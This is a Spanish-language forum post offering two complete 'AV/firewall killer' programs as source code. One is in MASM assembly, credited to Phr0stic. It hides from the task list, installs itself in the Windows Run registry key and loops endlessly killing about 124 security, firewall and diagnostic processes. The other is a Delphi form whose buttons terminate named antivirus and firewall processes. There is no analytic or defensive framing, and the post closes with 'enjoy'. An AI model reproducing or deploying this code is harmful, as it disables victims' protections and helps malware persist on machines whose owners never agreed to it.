EJEMPLO de dos AV/FIREWALL killers

[Hexentriko]

EJEMPLO EN ASM

CODE 
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; AVKillah 2 by Phr0stic
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
.386
.model flat, stdcall
option casemap:none
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\advapi32.inc
includelib \masm32\lib\advapi32.lib
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
  getfile proto :dword,:dword
  FindMe proto :dword
  pe32 struct
     dwSize dword ?
     cntUsage dword ?
     ID dword ?
     th32DefaultHea pID dword ?
     th32ModuleID dword ?
     cntThreads dword ?
     th32ParentProc essID dword ?
     pcPriClassBase dword ?
     dwFlags dword ?
     szExe db 260 dup(?)
  pe32 ends
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
.const
  sz000 db "regedit.exe",0
  sz001 db "netstat.exe",0
  sz002 db "tracert.exe",0
  sz003 db "msconfig.exe",0
  sz004 db "sysedit.exe",0
  sz005 db "zapro.exe",0
  sz006 db "zonealarm.exe",0
  sz007 db "zatutor.exe",0
  sz008 db "zauinst.exe",0
  sz009 db "minilog.exe",0
  sz010 db "vsmon.exe",0
  sz011 db "navapw32.exe",0
  sz012 db "lockdown.exe",0
  sz013 db "ants.exe",0
  sz014 db "fast.exe",0
  sz015 db "guard.exe",0
  sz016 db "update.exe",0
  sz017 db "autoupdate.exe",0
  sz018 db "tc.exe",0
  sz019 db "spyxx.exe",0
  sz020 db "clean.exe",0
  sz021 db "pview95.exe",0
  sz022 db "drwatson.exe",0
  sz023 db "sfc.exe",0
  sz024 db "msinfo32.exe",0
  sz025 db "nsched32.exe",0
  sz026 db "cleaner.exe",0
  sz027 db "lsetup.exe",0
  sz028 db "aupdate.exe",0
  sz029 db "luall.exe",0
  sz030 db "lucomserver.ex e",0
  sz031 db "luinit.exe",0
  sz032 db "navw32.exe",0
  sz033 db "navstub.exe",0
  sz034 db "bootwarn.exe",0
  sz035 db "qconsole.exe",0
  sz036 db "qserver.exe",0
  sz037 db "navdx.exe",0
  sz038 db "undoboot.exe",0
  sz039 db "cfgwiz.exe",0
  sz040 db "moolive.exe",0
  sz041 db "tca.exe",0
  sz042 db "tcm.exe",0
  sz043 db "tds-3.exe",0
  sz044 db "ss3edit.exe",0
  sz045 db "update.exe",0
  sz046 db "anti-trojan.exe",0
  sz047 db "atcon.exe",0
  sz048 db "atupdater.exe",0
  sz049 db "atwatch.exe",0
  sz050 db "wgfe95.exe",0
  sz051 db "poproxy.exe",0
  sz052 db "nprotect.exe",0
  sz053 db "vsstat.exe",0
  sz054 db "vshwin32.exe",0
  sz055 db "ndd32.exe",0
  sz056 db "mcagent.exe",0
  sz057 db "mcupdate.exe",0
  sz058 db "avpcc.exe",0
  sz059 db "avpm.exe",0
  sz060 db "watchdog.exe",0
  sz061 db "taumon.exe",0
  sz062 db "iamapp.exe",0
  sz063 db "iamserv.exe",0
  sz064 db "lockdown2000.e xe",0
  sz065 db "sphinx.exe",0
  sz066 db "avconsol.exe",0
  sz067 db "webscanx.exe",0
  sz068 db "vsecomr.exe",0
  sz069 db "_avp32.exe",0
  sz070 db "_avpcc.exe",0
  sz071 db "_avpm.exe",0
  sz072 db "avp32.exe",0
  sz073 db "avpcc.exe",0
  sz074 db "avp.exe",0
  sz075 db "pcciomon.exe",0
  sz076 db "icload95.exe",0
  sz077 db "icmon.exe",0
  sz078 db "icsupp95.exe",0
  sz079 db "icloadnt.exe",0
  sz080 db "icsuppnt.exe",0
  sz081 db "frw.exe",0
  sz082 db "firewall.exe",0
  sz083 db "antivirus.exe",0
  sz084 db "blackice.exe",0
  sz085 db "blackd.exe",0
  sz086 db "wrctrl.exe",0
  sz087 db "wradmin.exe",0
  sz088 db "cleaner3.exe",0
  sz089 db "pcfwallicon.ex e",0
  sz090 db "aplica32.exe",0
  sz091 db "cfiadmin.exe",0
  sz092 db "cfiaudit.exe",0
  sz093 db "cfinet32.exe",0
  sz094 db "cfinet.exe",0
  sz095 db "tds2-98.exe",0
  sz096 db "tds2-nt.exe",0
  sz097 db "safeweb.exe",0
  sz098 db "nvarch16.exe",0
  sz099 db "vsmain.exe",0
  sz100 db "persfw.exe",0
  sz101 db "avsynmgr.exe",0
  sz102 db "pavproxy.exe",0
  sz103 db "mssmmc32.exe",0
  sz104 db "trjscan.exe",0
  sz105 db "defwatch.exe",0
  sz106 db "vpc42.exe",0
  sz107 db "rtvscn95.exe",0
  sz108 db "vptray.exe",0
  sz109 db "mgui.exe",0
  sz110 db "apvxdwin.exe",0
  sz111 db "fsav.exe",0
  sz112 db "agentsvr.exe",0
  sz113 db "nmain.exe",0
  sz114 db "nisum.exe",0
  sz115 db "nisserv.exe",0
  sz116 db "taskmon.exe",0
  sz117 db "rrguard.exe",0
  sz118 db "rescue32.exe",0
  sz119 db "rescue.exe",0
  sz120 db "rshell.exe",0
  sz121 db "apimonitor.exe",0
  sz122 db "borg2.exe",0
  sz123 db "W32dsm89.exe",0
  sz124 db "cleanpc.exe",0
  szK32 db "kernel32.dll",0
  szRSP db "RegisterServic eProcess",0
  szRun db "SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0
  szReg db "SysEnum",0
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
.data?
  hReg dd ?
  szPath db 256 dup(?)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
.code
start:
invoke GetModuleHandl e, addr szK32
INVOKE   GetProcAddress, EAX, ADDR szRSP
test eax, eax
jz addme
push 1
push 0
call eax
addme:
invoke RegOpenKeyEx, 80000002h, addr szRun, 0, 00020000h+0002h+0004h, addr hReg
invoke GetModuleFileN ame, 0, addr szPath, sizeof szPath
invoke RegSetValueEx, hReg, ADDR szReg, 0, 1, addr szPath, eax
invoke RegCloseKey, hReg
hey:
invoke FindMe, addr sz001
invoke FindMe, addr sz002
invoke FindMe, addr sz003
invoke FindMe, addr sz004
invoke FindMe, addr sz005
invoke FindMe, addr sz006
invoke FindMe, addr sz007
invoke FindMe, addr sz008
invoke FindMe, addr sz009
invoke FindMe, addr sz010
invoke FindMe, addr sz011
invoke FindMe, addr sz012
invoke FindMe, addr sz013
invoke FindMe, addr sz014
invoke FindMe, addr sz015
invoke FindMe, addr sz016
invoke FindMe, addr sz017
invoke FindMe, addr sz018
invoke FindMe, addr sz019
invoke FindMe, addr sz020
invoke FindMe, addr sz021
invoke FindMe, addr sz022
invoke FindMe, addr sz023
invoke FindMe, addr sz024
invoke FindMe, addr sz025
invoke FindMe, addr sz026
invoke FindMe, addr sz027
invoke FindMe, addr sz028
invoke FindMe, addr sz029
invoke FindMe, addr sz030
invoke FindMe, addr sz031
invoke FindMe, addr sz032
invoke FindMe, addr sz033
invoke FindMe, addr sz034
invoke FindMe, addr sz035
invoke FindMe, addr sz036
invoke FindMe, addr sz037
invoke FindMe, addr sz038
invoke FindMe, addr sz039
invoke FindMe, addr sz040
invoke FindMe, addr sz041
invoke FindMe, addr sz042
invoke FindMe, addr sz043
invoke FindMe, addr sz044
invoke FindMe, addr sz045
invoke FindMe, addr sz046
invoke FindMe, addr sz047
invoke FindMe, addr sz048
invoke FindMe, addr sz049
invoke FindMe, addr sz050
invoke FindMe, addr sz051
invoke FindMe, addr sz052
invoke FindMe, addr sz053
invoke FindMe, addr sz054
invoke FindMe, addr sz055
invoke FindMe, addr sz056
invoke FindMe, addr sz057
invoke FindMe, addr sz058
invoke FindMe, addr sz059
invoke FindMe, addr sz060
invoke FindMe, addr sz061
invoke FindMe, addr sz062
invoke FindMe, addr sz063
invoke FindMe, addr sz064
invoke FindMe, addr sz065
invoke FindMe, addr sz066
invoke FindMe, addr sz067
invoke FindMe, addr sz068
invoke FindMe, addr sz069
invoke FindMe, addr sz070
invoke FindMe, addr sz071
invoke FindMe, addr sz072
invoke FindMe, addr sz073
invoke FindMe, addr sz074
invoke FindMe, addr sz075
invoke FindMe, addr sz076
invoke FindMe, addr sz077
invoke FindMe, addr sz078
invoke FindMe, addr sz079
invoke FindMe, addr sz080
invoke FindMe, addr sz081
invoke FindMe, addr sz082
invoke FindMe, addr sz083
invoke FindMe, addr sz084
invoke FindMe, addr sz085
invoke FindMe, addr sz086
invoke FindMe, addr sz087
invoke FindMe, addr sz088
invoke FindMe, addr sz089
invoke FindMe, addr sz090
invoke FindMe, addr sz091
invoke FindMe, addr sz092
invoke FindMe, addr sz093
invoke FindMe, addr sz094
invoke FindMe, addr sz095
invoke FindMe, addr sz096
invoke FindMe, addr sz097
invoke FindMe, addr sz098
invoke FindMe, addr sz099
invoke FindMe, addr sz100
invoke FindMe, addr sz101
invoke FindMe, addr sz102
invoke FindMe, addr sz103
invoke FindMe, addr sz104
invoke FindMe, addr sz105
invoke FindMe, addr sz106
invoke FindMe, addr sz107
invoke FindMe, addr sz108
invoke FindMe, addr sz109
invoke FindMe, addr sz110
invoke FindMe, addr sz111
invoke FindMe, addr sz112
invoke FindMe, addr sz113
invoke FindMe, addr sz114
invoke FindMe, addr sz115
invoke FindMe, addr sz116
invoke FindMe, addr sz117
invoke FindMe, addr sz118
invoke FindMe, addr sz119
invoke FindMe, addr sz120
invoke FindMe, addr sz121
invoke FindMe, addr sz122
invoke FindMe, addr sz123
invoke FindMe, addr sz124
jmp hey
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
FindMe proc szFile:dword
local lpMoop32:pe32
local szBuffer[256]:byte

mov lpMoop32.dwSiz e, sizeof lpMoop32
invoke CreateToolhelp 32Snapshot, 2, 0
mov esi, eax
  lea edi, szFile
invoke Process32First, esi, addr lpMoop32
@@loop:
 invoke getfile, addr lpMoop32.szExe, addr szBuffer
 invoke lstrcmpiA, edi, addr szBuffer
 test eax, eax
 jnz @@continue
     invoke OpenProcess, 0001h, 0, lpMoop32.ID
     invoke TerminateProce ss, eax, 0
@@continue:
     invoke Process32Next, esi, addr lpMoop32
 test eax, eax
 jz @@done
     jmp @@loop
@@done:
 invoke CloseHandle, esi
 ret
FindMe endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
getfile proc lppath:dword,lpbuffer:dword
push       edi
mov        ecx, lppath
@@:
mov        al, [ecx]
inc          ecx
cmp         al, 0
je            @f
cmp         al, "\"
jne          @b
mov        edx, ecx
jmp         @b
@@:
sub         ecx, lppath
add         ecx, edx
mov        edi, lpbuffer
@@:
mov        al, [edx]
inc          edx
mov        [edi], al
inc          edi
cmp         edx, ecx
jne          @b
pop         edi
ret
getfile endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
end start



--------------------------------------------------------------

EJEMPLO EN DELPHI

CODE 

unit Unit1;

interface

uses
 Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
 Tlhelp32, StdCtrls;

type
 TForm1 = class(TForm)
   GroupBox1: TGroupBox;
   Button1: TButton;
   Button2: TButton;
   Button3: TButton;
   Button4: TButton;
   Button5: TButton;
   Button6: TButton;
   Button7: TButton;
   Button8: TButton;
   Button9: TButton;
   Button10: TButton;
   Button11: TButton;
   Button12: TButton;
   Button13: TButton;
   Button14: TButton;
   Button15: TButton;
   GroupBox2: TGroupBox;
   Button16: TButton;
   Button17: TButton;
   procedure Button1Click(Sender: TObject);
   procedure Button2Click(Sender: TObject);
   procedure Button3Click(Sender: TObject);
   procedure Button4Click(Sender: TObject);
   procedure Button5Click(Sender: TObject);
   procedure Button6Click(Sender: TObject);
   procedure Button7Click(Sender: TObject);
   procedure Button8Click(Sender: TObject);
   procedure Button9Click(Sender: TObject);
   procedure Button10Click(Sender: TObject);
   procedure Button11Click(Sender: TObject);
   procedure Button12Click(Sender: TObject);
   procedure Button13Click(Sender: TObject);
   procedure Button14Click(Sender: TObject);
   procedure Button15Click(Sender: TObject);
   procedure Button16Click(Sender: TObject);
   procedure Button17Click(Sender: TObject);
 private
   { Private declarations }
 public
   { Public declarations }
 end;

var
 Form1: TForm1;

implementation

{$R *.DFM}

function KillTask(ExeFileName: string): integer;
const
 PROCESS_TERMIN ATE=$0001; 
var
 ContinueLoop: BOOL;
 FSnapshotHandl e: THandle;
 FProcessEntry3 2: TProcessEntry3 2; 
begin
 result := 0; 

 FSnapshotHandl e := CreateToolhelp 32Snapshot
                    (TH32CS_SNAPPRO CESS, 0); 
 FProcessEntry3 2.dwSize := Sizeof(FProcessEntry3 2);
 ContinueLoop := Process32First(FSnapshotHandl e, 
                                FProcessEntry3 2);

 while integer(ContinueLoop) <> 0 do
 begin
   if ((UpperCase(ExtractFileNam e(FProcessEntry3 2.szExeFile)) =
        UpperCase(ExeFileName))
    or (UpperCase(FProcessEntry3 2.szExeFile) =
        UpperCase(ExeFileName))) then
     Result := Integer(TerminateProce ss(OpenProcess(
                       PROCESS_TERMIN ATE, BOOL(0),
                       FProcessEntry3 2.th32ProcessI D), 0)); 
   ContinueLoop := Process32Next(FSnapshotHandl e,
                                 FProcessEntry3 2);
 end; 

 CloseHandle(FSnapshotHandl e); 
end;


procedure killavp;
 begin
 try
 KillTask ('_AVP32.EXE');
 KillTask ('_AVPCC.EXE');
 KillTask ('_AVPM.EXE');
 KillTask ('AVP32.EXE');
 KillTask ('AVPCC.EXE');
 KillTask ('AVPM.EXE');
 KillTask ('AVP.EXE');
 except Exit; end;
 end;

 procedure killnav;
 begin
 try
 KillTask ('NAVAPW32.EXE');
 KillTask ('NAVW32.EXE');
 except Exit; end;
 end;

 procedure killsophos;
 begin
 try
 KillTask ('ICLOAD95.EXE');
 KillTask ('ICMON.EXE');
 KillTask ('ICSUPP95.EXE');
 KillTask ('ICLOADNT.EXE');
 KillTask ('ICSUPPNT.EXE');
 except Exit; end;
 end;

 procedure killpanda;
 begin
 try
 KillTask ('IFACE.EXE');
 except Exit; end;
 end;

 procedure killants;
 begin
 try
 KillTask ('ANTS.EXE');
 except Exit; end;
 end;

 procedure killantitrojan;
 begin
 try
 KillTask ('Anti-Trojan.exe');
 except Exit; end;
 end;

 procedure killatguard;
 begin
 try
 KillTask ('iamapp.exe');
 KillTask ('iamserv.exe');
 except;
 exit;
 end;
 end;

procedure killconseal;
 begin
  try
  KillTask ('FRW.EXE');
  except;
  exit;
  end;
  end;

procedure killblackice;
 begin
 try
  KillTask ('blackice.exe');
  KillTask ('blackd.exe');
  except;
  exit;
  end;
  end;

 procedure killzonealarm;
 begin
 try
  KillTask ('zonealarm.exe');
  KillTask ('vsmon.exe');
  except;
  exit;
  end;
  end;

 procedure killwinroute;
 begin
 try
  KillTask ('WrCtrl.exe');
  KillTask ('WrAdmin.exe');
  KillTask ('WrCtrl.exe');
  except;
  exit;
  end;
  end;

procedure killcleaner;
 begin
  try
  KillTask ('cleaner3.exe');
  KillTask ('cleaner.exe');
  KillTask ('tca.exe');
  KillTask ('MooLive.exe');
  except;
  exit;
  end;
  end;


  procedure killlockdown;
  begin
  try
  KillTask ('lockdown2000.e xe');
  except;
  exit;
  end;
  end;

  procedure killsphinx;
  begin
  try
  KillTask ('Sphinx.exe');
  except;
  exit;
  end;
  end;

  procedure killmcafee;
  begin
  try
  KillTask ('VSHWIN32.EXE');
  KillTask ('VSECOMR.EXE');
  KillTask ('WEBSCANX.EXE');
  KillTask ('AVCONSOL.EXE');
  KillTask  ('VSSTAT.EXE');
  except;
  exit;
  end;
  end;


procedure TForm1.Button1 Click(Sender: TObject);
begin
killavp;
end;

procedure TForm1.Button2 Click(Sender: TObject);
begin
killnav;
end;

procedure TForm1.Button3 Click(Sender: TObject);
begin
killsophos;
end;

procedure TForm1.Button4 Click(Sender: TObject);
begin
killpanda;
end;

procedure TForm1.Button5 Click(Sender: TObject);
begin
killants;
end;

procedure TForm1.Button6 Click(Sender: TObject);
begin
killantitrojan;
end;

procedure TForm1.Button7 Click(Sender: TObject);
begin
killatguard;
end;

procedure TForm1.Button8 Click(Sender: TObject);
begin
killconseal;
end;

procedure TForm1.Button9 Click(Sender: TObject);
begin
killblackice;
end;

procedure TForm1.Button1 0Click(Sender: TObject);
begin
killzonealarm;
end;

procedure TForm1.Button1 1Click(Sender: TObject);
begin
killwinroute;
end;

procedure TForm1.Button1 2Click(Sender: TObject);
begin
killcleaner;
end;

procedure TForm1.Button1 3Click(Sender: TObject);
begin
killlockdown;
end;

procedure TForm1.Button1 4Click(Sender: TObject);
begin
killsphinx;
end;

procedure TForm1.Button1 5Click(Sender: TObject);
begin
killmcafee;
end;

procedure TForm1.Button1 6Click(Sender: TObject);
begin
killmcafee;
sleep(1000);
killsphinx;
sleep(1000);
killlockdown;
sleep(1000);
killcleaner;
sleep(1000);
killwinroute;
sleep(1000);
killzonealarm;
sleep(1000);
killblackice;
sleep(1000);
killconseal;
sleep(1000);
killatguard;
sleep(1000);
killantitrojan;
sleep(1000);
killants;
sleep(1000);
killsophos;
sleep(1000);
killnav;
sleep(1000);
killavp;
end;

procedure TForm1.Button1 7Click(Sender: TObject);
begin
showmessage('This program is designed to kill all the listed antivirus and firewall programs, you can kill each individually or all together! enjoy');
end;

end.